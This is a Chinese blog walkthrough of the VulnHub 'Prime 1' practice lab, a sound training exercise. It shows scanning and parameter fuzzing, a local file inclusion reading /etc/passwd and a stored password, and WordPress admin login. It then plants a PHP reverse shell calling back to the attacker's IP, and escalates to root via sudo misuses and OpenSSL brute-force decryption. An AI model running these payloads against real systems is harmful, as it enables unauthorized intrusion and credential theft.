红队渗透靶场之prime1.0(超详细!)

最新推荐文章于 2024-05-17 14:57:23 发布
最新推荐文章于 2024-05-17 14:57:23 发布
阅读量1.1k 收藏 12
点赞数 4
分类专栏: 靶场 文章标签: 安全 linux 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/128536171
版权

靶场考察知识

Wordpress

WordPress是一个免费的开源内容管理系统(CMS),可以用来创建和管理网站或博客。它是由PHP语言和MySQL数据库构建的,并且拥有大量的插件和主题,可以让您轻松地自定义网站的外观和功能


Wpscan扫描工具

WPScan是一款开源的WordPress安全扫描工具,常用于渗透测试WordPress网站。它运行在Kali Linux操作系统上,也可以在其他类Unix系统(如MacOS和Linux)上使用。

WPScan可以帮助您扫描WordPress网站以寻找漏洞,并尝试利用这些漏洞获得对目标网站的访问权限。它还可以帮助您识别目标网站使用的WordPress版本、插件和主题,并检测是否存在已知的漏洞, 下面是WPScan的一些常用操作:

1.扫描WordPress网站,列出发现的漏洞和配置问题

wpscan --url <target_url>

2.枚举WordPress网站的用户

wpscan --url <target_url> --enumerate u

3.列出WordPress网站所有安装的插件, 并检查是否存在可利用的漏洞

wpscan --url <target_url> --enumerate p

4.列出WordPress网站使用的所有主题, 并检查是否存在可利用的漏洞

wpscan --url <target_url> --enumerate t

Openssl加解密

Openssl是一个用于实现各种加密和安全协议的开源工具。可以使用openssl enc命令来加密文件,并使用openssl enc -d命令来解密加密文件


靶场搭建

prime靶场下载地址: https://download.vulnhub.com/prime/Prime_Series_Level-1.rar


渗透步骤

信息收集

1.namp扫描

扫描C段存活主机nmap -sn 192.168.47.0/24, 确定prime靶场主机为192.168.47.158

image-20221222155435710


扫描开放端口, 只有22和80端口处于开放状态

image-20221222155722023

image-20221222155734055


2.dirb目录爆破

使用dirb对目标主机80端口进行爆破, 并将结果保存在当前文件夹的DirbReport.txt, 扫描结果如下图所示

dirb http://192.168.47.158 -o DirbReport.txt

image-20221222162820356


访问目标网站的根目录, 只发现了一张kali图标图片, 没有其他线索

image-20221222162918950


访问/dev目录, 页面提示意思, “你爆破的不够狠, 还需继续往深一点爆破”, 也就是说它要求我们继续使用Dirb爆破, 从而获取更多信息

image-20221222163056554


调整一下Dirb的使用参数, 爆破后缀名为txt和zip的文件(往往提示信息都是以文本文件为主), 扫描结果显示, 存在secret.txt文件

dirb http://192.168.47.158 -X .txt,.zip

image-20221222164750396


访问http://192.168.47.158/secret.txt, 页面显示一段话, 简单来说就是要我们对找到的每个php页面进行参数爆破, 并给予文章提供参考(https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web), 最后一段话还提示我们要获取了location.txt文件才能进行下一步的操作

image-20221222165652921


根据上面的提示, 使用dirb对php页面进行爆破, 爆出image.phpindex.php

dirb http://192.168.47.158 -X .php

image-20221223103906878


3.wfuzz参数爆破

读取这篇github文章, 要求我们要用wfuzz命令来对php页面进行参数爆破, 还给了一行命令来演示: wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something

–hc 404表示不显示状态码为404的页面

image-20221222165914416


使用如下命令对index.php的参数进行爆破, 从爆破结果来看, 出现了很多无效信息, 我们可以通过--hc--hw, --hh来过滤信息

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.47.158/index.php?FUZZ=something

image-20221223160928388


使用--hh参数排除页面响应长度为136的数据, 最终只显示一个参数结果: file

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.47.158/index.php?FUZZ=something

image-20221223161918406


访问file参数: curl http://192.168.47.158/index.php?file , 页面显示:“干的不错, 但你挖的是一个错误的文件”, 也就是说file参数没有指定正确的文件 image-20221223162144156


综合上述secret.txt中的最后一段话:“注意location.txt这个文件, 后续的操作你需要用到它”, 或许这个file参数的值可以修改为location.txt

curl http://192.168.47.158/index.php?file=location.txt

image-20221223170145625

从页面显示内容上看, 它要求你在其他php页面使用"secrettier360"参数, 也就是说要在image.php使用secrettier360参数


访问image.php页面并配合secrettier360参数, 页面显示"最终你找到了正确的参数"

curl http://192.168.47.158/image.php?secrettier360

image-20221223171020276


Web渗透

1.文件包含漏洞

既然上述的提示说了secrettier360这个参数是正确的, 那么可以尝试下本地文件包含漏洞, 读取系统用户信息

成功读取到了用户信息,并且在最后面的saket用户给予了我们重要信息: 在/home/saket目录下寻找password.txt文件

curl http://192.168.47.158/image.php?secrettier360=../../../../../../etc/passwd

image-20221228105610320


读取/home/saket/password.txt, 它给出的密码是follow_the_ippsec, 虽然我们不知道这个密码是用来干什么的, 但是我猜可能会是SSH远程登录或者网站管理员登录其中一个

image-20221228105951449


先来尝试ssh远程登录, 在上述爆出的用户信息中, 可能登录成功的用户有两个, 分别是victorsaket, 经过ssh登录尝试后, 均登录失败

image-20221228112512467


2.wordpress后台拿shell

从上述dirb爆破结果可知, 该网站是一个wordpress框架, 于是我们可以从该cms漏洞入手

image-20221228112815237


使用wpscan针对wordpress框架的网站进行特定漏洞扫描, 如下命令用于枚举网站用户

wpscan --url http://192.168.47.158/wordpress -e u

结果显示只有一个victor用户, 在上述读取的用户信息中, 也有一个victor用户, 那么此用户很可能是管理员用户

image-20221228114401063


在上述的dirb爆破结果中, 已经爆出后台管理员页面, 当然凭借经验我们也可以大概清楚后台页面地址, 浏览器访问http://192.168.47.158/wordpress/wp-admin/user/admin.php, 然后尝试使用victor/follow_the_ippsec登录, 很幸运, 登录成功了

image-20221229001100937


找到插件功能处, 首先尝试插件上传功能, 判断是否存在文件上传漏洞

image-20221229211836737


这里要求我们上传zip格式的文件, 随便上传一个压缩文件, 然后点击install Now上传

image-20221229212147832


文件上传失败, 提示父级目录没有写的权限

image-20221229212231597


既然文件上传不行, 那么就从主题编辑入手, 依次排查所有主题文件, 寻找能够编辑(拥有写的权限)的页面, 最终发现secret.php可以编辑

image-20221230113141576


在secret.php插入反弹Shell代码: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.47.155/4444 0>&1'");?>

image-20221230113557973


我们可以通过搭建wordpress框架的网站来获取主题文件的网页路径, 这里secret.php的路径是http://192.168.47.158/wordpress/wp-content/themes/twentynineteen/secret.php

在kali开启监听, 然后访问secret.php触发反弹shell

image-20221230114007571


主机提权

1.查看权限

输入sudo -l查看系统权限, 发现当前用户可以使用root权限, 而无需输入root用户密码执行/home/saket/enc

image-20221231113137369


进入/home/saket目录, 当前目录下有password.txt和user.txt, 但是无法查看enc文件, 因为权限不足, 但是拥有执行的权限

image-20221231113436806


执行enc文件, 随后要求输入当前用户的密码, 尝试输入password.txt里面的密码, 提示文件执行失败, 说明这个密码是错误的,我们还需要在此系统下深挖正确的密码

image-20221231113557065


2.搜索密码备份文件

执行如下命令, 寻找系统的所有备份文件, 因为有时候管理员会在系统留有密码备份文件

find / -name '*backup*' 2>/dev/null  | less| sort
  • find / -name '*backup*':这个命令在根目录(即 /)中搜索文件。-name 选项指定了搜索的文件名模式,在这里是 '*backup*'。这个模式表示任何文件名包含字符串 “backup” 的文件。find 命令会返回所有符合条件的文件的路径。
  • 2>/dev/null: /dev/null 是一个特殊的文件,它的作用是丢弃所有写入它的数据。即将错误输出重定向到 /dev/null 就相当于丢弃所有错误信息(例如权限不足),只保留正常输出
  • | less:管道符(|)将前一个命令的输出传递给后一个命令。在这里,less 命令是一个文本浏览器,它可以让你在终端中浏览文本文件。将 find 的输出传递给 less 可以让你在终端中更方便地查看找到的文件的路径。
  • sort:这个命令对前一个命令的输出进行排序。在这里,它将找到的文件的路径按字母顺序排序。

1


从上述结果来看, 此系统存在很多备份文件, 而我们要寻找的是文件名带有user或者pass这种比较可疑的, 例如/opt/backup/server_database/backup_pass

查看/opt/backup/server_database/backup_pass, 文件提示: enc文件密码为"backup_password"

image-20221231123845436


3.openssl解密

使用sudo执行enc, 并输入密码backup_password, 随后在当前文件夹生成enc.txt和key.txt

image-20221231173403639


首先查看enc.txt, 文件内容是一段base64加密的字符串

image-20221231173545156


查看key.txt, 文件内容提示, 需要对"ippsec"字符串进行md5加密

image-20221231173621835


对"ippsec"字符串进行md5加密: echo -n "ippsec" | md5sum, 加密后的字符串为366a74cb3c959de17d61db30591c39d1

echo -n 表示 echo 命令不要输出换行符。这样,输出的字符串就不会换行,而是和 md5sum 的输出在同一行

image-20221231174031288


在ctf靶场中看到enc和key这两个关键字, 第一时间就该想到openssl加解密, 也就是说要使用openssl命令, 通过key值去解密enc文件的加密字符串

首先查看openssl命令中支持哪些算法: openssl --help

image-20230101111848805


将openssl中支持的加密算法名称保存在CryptType文件中

image-20230101111715897


如下代码为openssl常用解密命令, “-d"参数表示解密,”-a"参数表示使用base64编码,"-K"参数表示使用的密钥(需为16进制), enc是OpenSSL的编码和加密的缩写,它是OpenSSL提供的一个命令行工具,用于加密和解密文件和信息

echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}

首先要将key值"366a74cb3c959de17d61db30591c39d1"进行16进制编码, 可使用如下od命令

echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1
  • -An 表示不要输出地址信息。
  • -t x1 表示使用 16 进制编码输出每个字符

image-20230103150235189


为了让结果看起来更加清晰, 可以使用tr命令删除结果里的空格和换行符, 最终16进制编码的结果是3336366137346362336339353964653137643631646233303539316333396431

echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 | tr -d ' '

image-20230103150732332


可以使用Shell代码批量使用openssl命令对字符串尝试各种算法进行解密, 最终的执行结果提示, saket用户的密码为"tribute_to_ippsec"

for i in $(cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null echo $i;done

具体来说,这段代码会对CryptType文件中的每一行读取一个算法名称,然后使用openssl命令对字符串进行解密,其中使用的算法名称就是从CryptType文件中读取的。最后将解密结果和解密算法输出

image-20230101112502090


4.获取flag

ssh远程登录saket用户, 并输入解密出来的密码

image-20230101113436881


为了获取一个交互性更好的shell, 可使用python命令: python -c 'import pty;pty.spawn("/bin/bash")'

image-20230101113526041


查看当前用户的权限, 发现可以使用root权限无密码执行/home/victor/undefeated_victor

image-20230101160539561


执行此文件时提示没有/tmp/challenge, 它可能暗示我们去创建一个

image-20230101160726239


在tmp目录下创建challenge文件, 并写入如下内容

#!/bin/bash
/bin/bash

image-20230101161909272


赋予challenge可执行权限, 随后执行/home/victor/undefeated_victor, 成功获取root权限

image-20230101162148411


获取flag.txt

image-20230101162846255

Henry404s
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
红队渗透打点工具-FindUpload
03-07
FindUpload是一款红队打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
prime1主机渗透
w1157673482的博客
03-01 476
prime1主机渗透
Prime靶场
wcl20010的博客
05-02 463
prime靶场(vulnhub) 靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
【vulnhub靶场】PRIME:1打靶过程记录
didiplus
07-17 2726
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
vulnhub Prime1渗透
qq_45455136的博客
03-09 889
Prime1靶场渗透准备环境主机发现端口扫描目录扫描FUZZ和LFIWordPress漏洞扫描Linux内核漏洞提权 准备环境 攻击机与靶机在同一网段下 攻击机:kali 192.168.37.130 靶机:Prime1 未知 主机发现 kali使用namp扫描,得到靶机ip 192.168.37.131 kali使用arp-scan扫描,得到靶机ip kali使用netdiscover扫描,得到靶机ip 端口扫描 kali使用nmap扫描靶机全部端口,发现开放了22端口ssh服务和80端口http
一次prime1靶场红队渗透实战,从主机发现到Linux内核漏洞提权
QQQPPPAAALLLZZZ的博客
07-03 811
使用了namp端口和存活主机扫描 ,dir目录扫描, FUZZ参数扫描 , MSF反弹连接,LINUX内核提权。完成了从访问页面->获取后台管理员权限 -> 获取操作系统权限 -> 获取root权限的全过程。
Vulnhub之prime-1靶场[渗透测试]
qq_60115503的博客
08-29 1043
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透
近源渗透红队视角WiFi.pdf
03-24
无线网络已经事实上成为了企业移动化办公的重 要基础设施,但由于普遍缺乏有效的管理,部署与 使用人员的安全意识和专业知识的不足,导致AP分 布混乱,设备安全性脆弱,无线网络也越来越多的 成为黑客入侵企业内网...
渗透测试/红队/src全方位测试字典
09-01
这是安全测试人员的伴侣。它是安全评估期间使用的多种类型的列表的集合,收集在一个位置。列表类型包括用户名、密码、...目标是使安全测试人员能够将此存储库拉到新的测试框中,并可以访问可能需要的每种类型的列表。
红队综合渗透框架SatanSword
01-14
web指纹识别,集成whatweb及wappalyzer所有指纹及自己收集的web服务器指纹1839条+cms指纹1936条。 漏洞PoC检测,提供360+PoC检测脚本内置在数据库中,同时支持漏洞查询和代码查看及一键批量检测功能。...
Prime_Series靶场从探测到提权
cainsoftware的博客
09-15 1147
靶场开机就这 做的是NET的网卡跟我kali是一个网络 网络 192.168.34.0的 题目要求是同C段但是不知道ip地址 故直接nmap 扫描 目标服务器ip地址和开放服务和端口 没啥技术含量 可以看见ip为192.168.34.130的开放了 22 80 的2个服务 且网络容器是apache drib这里直接爆破目录 可见是一个wordpress的系统 二次扫描 -X 参数 [.txt][.php]的意思在爆破后缀添加 以.txt结尾和.php结...
vulnhub渗透测试靶机prime-1
weixin_46128614的博客
01-19 1153
靶机下载地址https://www.vulnhub.com/entry/prime-1,358/ nmap -sS -sV -p- -T5 发现只开了22和80那就从80入手吧 浏览器访问 主页除了一张图片啥都没有 dirb扫描目录发现了/wordpress目录和一些其他的页面 其中的image.php,secret.txt都不是默认字典有的,问了几个师傅,说做多了就有经验了,关键字典要自己...
【技术分享】Prime靶场
yy1715713348的博客
07-21 118
本篇文章记录了靶场prime的打靶过程,包括如何渗透、getshell和提权等环节。小星认为,此次打靶过程极具挑战性和趣味性,期待各位读者与小星交流探讨。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1472
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
【vulnhub 靶场prime1打靶记录
weixin_54603520的博客
05-09 263
【vulnhub 】---prime 靶场打靶记录
prime1靶场渗透
weixin_73562787的博客
07-18 213
靶场练习,详细全过程,prime1.0靶场
红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub)
Bossfrank的博客
06-11 1324
本篇博客详述了vulnhub靶机prime1的打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
安全+大模型应用系列之RSAC的Dropzone AI的分析
最新发布
si1ence的博客
05-17 398
从Dropzone AI广泛的认可度来看,国外对该思路的认可度较好,前期在国内项目验证的时候客户也非常感兴趣。但是目前国内的安全产品、安全平台较为封闭、无法像国外产品能够广泛直接对接、或许是当前制约国内的安全GPT广泛推广的一个阻碍; 安全+大模型的产品的逐渐按照多能力的安全专家(全能)的能力和价值去规划、应该是一个受客户认可的正确方向。
红队渗透测试lampiao
09-14
lampiao是一个用于红队渗透测试的虚拟机靶机。根据引用提供的信息,你可以通过以下步骤来进行该渗透测试: 1. 下载lampiao虚拟机:你可以从"https://download.vulnhub.com/lampiao/Lampiao.zip"下载lampiao虚拟机。下载完成后,解压缩文件并使用VirtualBox打开.ovf文件。 2. 扫描靶机信息:根据引用,你可以使用nmap工具对lampiao虚拟机进行详细的端口扫描,以了解是否有遗漏的端口。确保扫描到的所有端口都被纳入考虑范围。 3. 探索漏洞利用工具:根据引用,你可以搜寻一些漏洞的利用工具,如mirrors、FireFart和DirtyCOW。这些工具可能有助于你发现靶机中存在的漏洞,并帮助你进一步的渗透测试。 4. 利用漏洞进行渗透:一旦你发现了可能存在的漏洞,你可以使用相应的漏洞利用工具或手动方法来利用这些漏洞。这将帮助你获取更深入的访问权限,并探索靶机内部的潜在目标。 注意:在进行任何渗透测试之前,请确保你获得了合法的授权,并在合法的环境中进行测试。渗透测试是一项敏感的活动,需要遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值